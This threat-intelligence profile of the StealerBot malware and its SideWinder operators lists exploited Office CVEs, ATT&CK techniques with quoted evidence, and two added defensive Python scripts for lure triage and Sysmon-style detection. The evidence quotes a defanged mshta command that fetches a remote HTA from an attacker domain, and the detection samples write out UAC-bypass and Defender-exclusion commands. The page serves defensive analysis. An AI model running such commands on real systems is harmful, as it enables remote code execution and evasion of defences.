Mallory

StealerBot

Malware. Used by 1 actor. Exploits 2 CVEs.

EXPLOITED CVES

Vulnerabilities exploited

2 CVEs Mallory has correlated with this family across public research and vendor advisories.

CVE-2017-11882: Microsoft Office Equation Editor Remote Code Execution (exploited in the wild)

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”.

Source: securelist.com
CVE-2017-0199: Microsoft Office/WordPad Remote Code Execution Vulnerability (exploited in the wild)

→ DLL sideloading via legitimate signed binary → StealerBot (modular, in-memory espionage framework). The DOCX file exploits CVE-2017-0199 to fetch a remote template from internal-advisory-azerbaijan-russia-diplomatic-crisis[.]defence-np[.]net.

Source: breakglass intel (intel.breakglass.tech)
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.

SideWinder

This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

Source: securelist.com
MITRE ATT&CK

Techniques & procedures

26 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access (2 techniques)

T1566 Phishing (evidence: 1)

The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker.

T1566.001 Spearphishing Attachment (evidence: 3)

The attacker sends spear-phishing emails with a DOCX file attached.
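Both lures on this page are ordinary Office files that can be triaged offline before anything is detonated. The script below is an added example, not code from Mallory or from any of the cited vendor reports: it checks a DOCX for an external attachedTemplate relationship (the CVE-2017-0199 remote-template-injection pattern in the evidence above) and an RTF for an embedded Equation Editor object (the CVE-2017-11882 pattern). The sample DOCX and RTF documents, and the example.invalid template URL, are constructed for the demonstration.

```python
"""Offline triage for the two document lures described above.

Added example; not code from Mallory or from any vendor report.
Checks:
  1. DOCX remote template injection (CVE-2017-0199 / T1566): Word fetches
     whatever word/_rels/settings.xml.rels names as an External
     attachedTemplate, so any such relationship is worth flagging.
  2. RTF with an embedded Equation Editor object (CVE-2017-11882): the class
     is either declared in \\objclass or sits in the OLE1 header inside the
     hex-encoded \\objdata blob.
All sample documents below are constructed for this example.
"""
import re
import zipfile
from io import BytesIO
from typing import List, Optional
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# Equation Editor CLSID {0002CE02-0000-0000-C000-000000000046} in on-disk GUID byte order
EQNEDT_CLSID = bytes.fromhex("02CE020000000000C000000000000046")


def docx_remote_templates(data: bytes) -> List[str]:
    """Return the external attachedTemplate targets of a DOCX (empty if none)."""
    with zipfile.ZipFile(BytesIO(data)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return []
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
    return [
        rel.get("Target", "")
        for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship")
        if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External"
    ]


_OBJCLASS_RE = re.compile(rb"\\objclass\s+Equation", re.IGNORECASE)
_OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def rtf_has_equation_object(data: bytes) -> bool:
    """True if the RTF embeds an Equation Editor (EQNEDT32) OLE object."""
    if _OBJCLASS_RE.search(data):
        return True
    for m in _OBJDATA_RE.finditer(data):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        blob = bytes.fromhex(hexdata[: len(hexdata) & ~1].decode("ascii"))
        # OLE1 headers carry the class name as ASCII; OLE2 streams carry the CLSID
        if b"Equation" in blob or EQNEDT_CLSID in blob:
            return True
    return False


def build_sample_docx(template_url: Optional[str]) -> bytes:
    """Minimal in-memory DOCX; with a URL it carries the remote-template relationship."""
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    r_ns = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    rel = (
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_url}" TargetMode="External"/>'
        if template_url else ""
    )
    attached = '<w:attachedTemplate r:id="rId1"/>' if template_url else ""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>')
        z.writestr("word/settings.xml",
                   f'<w:settings xmlns:w="{w_ns}" xmlns:r="{r_ns}">{attached}</w:settings>')
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{PKG_REL_NS}">{rel}</Relationships>')
    return buf.getvalue()


# OLE 1.0 object header naming Equation.3, as it appears hex-encoded inside \objdata
_OLE1_EQUATION_HEX = (
    b"\x01\x05\x00\x00"      # OLE version
    b"\x02\x00\x00\x00"      # format id 2 = embedded object
    b"\x0b\x00\x00\x00"      # class-name length, including the NUL
    b"Equation.3\x00"
    b"\x00" * 8              # empty topic and item names
).hex().encode("ascii")

RTF_OBJCLASS = rb"{\rtf1\ansi{\object\objemb{\*\objclass Equation.3}{\*\objdata 0105}}\par}"
RTF_OBJDATA_ONLY = (
    rb"{\rtf1\ansi{\object\objemb\objw380\objh260{\*\objdata " + _OLE1_EQUATION_HEX + rb"}}\par}"
)
RTF_BENIGN = rb"{\rtf1\ansi Quarterly report\par}"

if __name__ == "__main__":
    print(docx_remote_templates(build_sample_docx("http://example.invalid/brief.dotm")))
    print(rtf_has_equation_object(RTF_OBJCLASS), rtf_has_equation_object(RTF_OBJDATA_ONLY),
          rtf_has_equation_object(RTF_BENIGN))
```

Any External attachedTemplate is worth a look regardless of scheme, since Word will also resolve UNC paths. The RTF check assumes the hex blob is contiguous; obfuscated RTF that splits \objdata with control words needs a real RTF parser such as oletools' rtfobj.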

Execution (4 techniques)

T1059 Command and Scripting Interpreter (evidence: 1)

Live Console (Module 0xcb) -- reverse shell access

T1059.003 Windows Command Shell (evidence: 2)

By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.

T1059.007 JavaScript (evidence: 1)

The exploit file contained a shellcode... to run embedded JavaScript code invoking the mshtml.RunHTMLApplication function.

T1203 Exploitation for Client Execution (evidence: 2)

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process.

Privilege Escalation (3 techniques)

T1055 Process Injection (evidence: 1)

RDP Credential Stealer (Module 0xe0) -- mstsc.exe injection

T1548 Abuse Elevation Control Mechanism (evidence: 1)

UAC Bypass (Module 0xd6) -- CMSTP and IElevatedFactoryServer COM exploitation

T1548.002 Bypass User Account Control (evidence: 1)

UACBypass... designed to bypass UAC and run malicious code with high privileges... By default, it tries to abuse the CMSTP program... If these security solutions are detected, the malware attempts to use... the “IElevatedFactoryServer” COM object.

Defense Evasion (6 techniques)

T1027 Obfuscated Files or Information (evidence: 2)

The remote HTA embeds a heavily obfuscated JavaScript file... strings, initially encoded with a substitution algorithm... embedded within its code as a base64-encoded .NET serialized stream.

T1055 Process Injection (evidence: 1)

RDP Credential Stealer (Module 0xe0) -- mstsc.exe injection

T1218.005 Mshta (evidence: 2)

the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from a remote server

T1497 Virtualization/Sandbox Evasion (evidence: 1)

The RTF delivery includes server-side geofencing (likely IP-based victim filtering) and User-Agent validation requiring legitimate Microsoft Office strings, ensuring that sandboxes and researchers receive decoy content or 404s.

T1564.003 Hidden Window (evidence: 1)

gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);

T1620 Reflective Code Loading (evidence: 1)

Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method... We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module.

Credential Access (5 techniques)

T1056 Input Capture (evidence: 2)

This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.

T1056.001 Keylogging (evidence: 2)

This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes...

T1539 Steal Web Session Cookie (evidence: 1)

The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services...

T1555 Credentials from Password Stores (evidence: 2)

The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services...

T1649 Steal or Forge Authentication Certificates (evidence: 1). Note: the evidence below concerns PuTTY .ppk private keys, which ATT&CK files under T1552.004 Private Keys rather than T1649.

File Stealer (Module 0xd4) -- targets .ppk ... For a diplomatic target, the file stealer and credential modules are the priority. .ppk files (PuTTY private keys) are specifically targeted

Discovery (1 technique)

T1497 Virtualization/Sandbox Evasion (evidence: 1)

The RTF delivery includes server-side geofencing (likely IP-based victim filtering) and User-Agent validation requiring legitimate Microsoft Office strings, ensuring that sandboxes and researchers receive decoy content or 404s.

Collection (5 techniques)

T1005 Data from Local System (evidence: 2)

The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions.

T1025 Data from Removable Media (evidence: 1)

It also scans removable drives to steal files with specific extensions.

T1056 Input Capture (evidence: 2)

This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.

T1056.001 Keylogging (evidence: 2)

This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes...

T1113 Screen Capture (evidence: 2)

This module periodically grabs screenshots of the primary screen.

Command and Control (3 techniques)

T1071 Application Layer Protocol (evidence: 1)

A single MD5 hash and a filename... Behind that hash was a SideWinder APT command-and-control domain hosting four simultaneous espionage campaigns...

T1105 Ingress Tool Transfer (evidence: 2)

mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui ... The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware

T1219 Remote Access Tools (evidence: 1)

Live Console... can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands.

Other (1 technique; T1562.001 belongs to the Defense Evasion tactic in ATT&CK)

T1562.001 Disable or Modify Tools (evidence: 1)

The library can also process custom commands that provide the following capabilities... Add Windows Defender exclusions;
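The execution, UAC-bypass, mshta and Defender-exclusion procedures above, and the mstsc.exe injection, all leave process telemetry. The script below is an added example, not a Mallory detection and not a rule from any of the cited reports: it runs five rule checks over a handful of constructed Sysmon-style events (field names follow Sysmon event 1, ProcessCreate, and event 8, CreateRemoteThread; the paths, the cdn.example.invalid URL and the record ids are made up). It generalizes from the specific commands on this page to the parent/child and argument patterns behind them: a document host or EQNEDT32.EXE spawning a script host, mshta fetching from a URL, cmstp.exe doing a silent INF install, a Defender exclusion being added, and a thread created in mstsc.exe from outside System32.

```python
"""Rule checks over Sysmon-style process telemetry for the procedures above.

Added example; not a Mallory rule or a rule from the cited vendor reports.
Field names follow Sysmon event 1 (ProcessCreate) and event 8
(CreateRemoteThread); every event at the bottom is constructed.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Office hosts, plus the Equation Editor process the CVE-2017-11882 shellcode runs in
DOCUMENT_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "cmstp.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _image_name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(ev: Event) -> List[str]:
    """Names of every rule the event matches; ATT&CK ids are in the comments."""
    hits: List[str] = []
    if ev.get("EventID") == "8":
        # T1055: thread created in mstsc.exe by an image outside System32
        source = ev.get("SourceImage", "").lower()
        if (_image_name(ev.get("TargetImage", "")) == "mstsc.exe"
                and not source.startswith("c:\\windows\\system32\\")):
            hits.append("remote_thread_into_mstsc")
        return hits

    image = _image_name(ev.get("Image", ""))
    parent = _image_name(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    lowered = cmd.lower()
    args = lowered.split()
    # T1203 / T1566.001: document host or EQNEDT32.EXE spawning a script host or LOLBin
    if parent in DOCUMENT_HOSTS and image in SCRIPT_HOSTS:
        hits.append("document_host_spawns_script_host")
    # T1218.005 / T1105 / T1564.003: mshta fetching its HTA straight from a URL
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
    # T1548.002: cmstp.exe silent (/s), no-UI (/ni) install of an attacker-supplied INF
    if (image == "cmstp.exe" and "/ni" in args and "/s" in args
            and any(a.endswith(".inf") for a in args)):
        hits.append("cmstp_silent_inf_install")
    # T1562.001: Defender exclusion added via the PowerShell cmdlet or the registry key
    if ("add-mppreference" in lowered and "-exclusion" in lowered) or (
            image == "reg.exe" and "windows defender\\exclusions" in lowered):
        hits.append("defender_exclusion_added")
    return hits


def scan(events: List[Event]) -> List[Tuple[str, str]]:
    """(RecordId, rule) for every hit, in event order."""
    return [(ev["RecordId"], rule) for ev in events for rule in match_rules(ev)]


# Constructed events: paths, the URL and the record ids are made up for this example
SAMPLE_EVENTS: List[Event] = [
    {"RecordId": "1", "EventID": "1",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://cdn.example.invalid/19263687/trui"},
    {"RecordId": "2", "EventID": "1",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c start mshta.exe"},
    {"RecordId": "3", "EventID": "1",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\Public\Libraries\conn.inf"},
    {"RecordId": "4", "EventID": "1",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -W Hidden Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"RecordId": "5", "EventID": "8",
     "SourceImage": r"C:\Users\Public\Libraries\loader.exe",
     "TargetImage": r"C:\Windows\System32\mstsc.exe"},
    {"RecordId": "6", "EventID": "1",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for record_id, rule in scan(SAMPLE_EVENTS):
        print(record_id, rule)
```

In production these checks map onto Sigma rules keyed on the same fields; the Defender exclusion rule should additionally watch registry value sets (Sysmon event 13) under the Windows Defender\Exclusions keys, since the malware's custom command may write there without going through PowerShell.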

INDICATORS OF COMPROMISE

IOCs tracked for this family

217 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network: 157 tracked (IPs, domains, and DNS infrastructure linked to this family).
Hashes: 59 tracked (MD5, SHA-1, SHA-256 from samples and reports).
Other: 1 tracked (other indicator types observed in public reporting).

Type         Value        Latest sighting
domain       (withheld)   3 months ago
domain       (withheld)   3 months ago
domain       (withheld)   3 months ago
hash.sha256  (withheld)   3 months ago
hash.sha256  (withheld)   3 months ago
ip.v4        (withheld)   3 months ago
ACTIVITY FEED

Recent activity

3 sources tracked across advisories, community write-ups, and news.
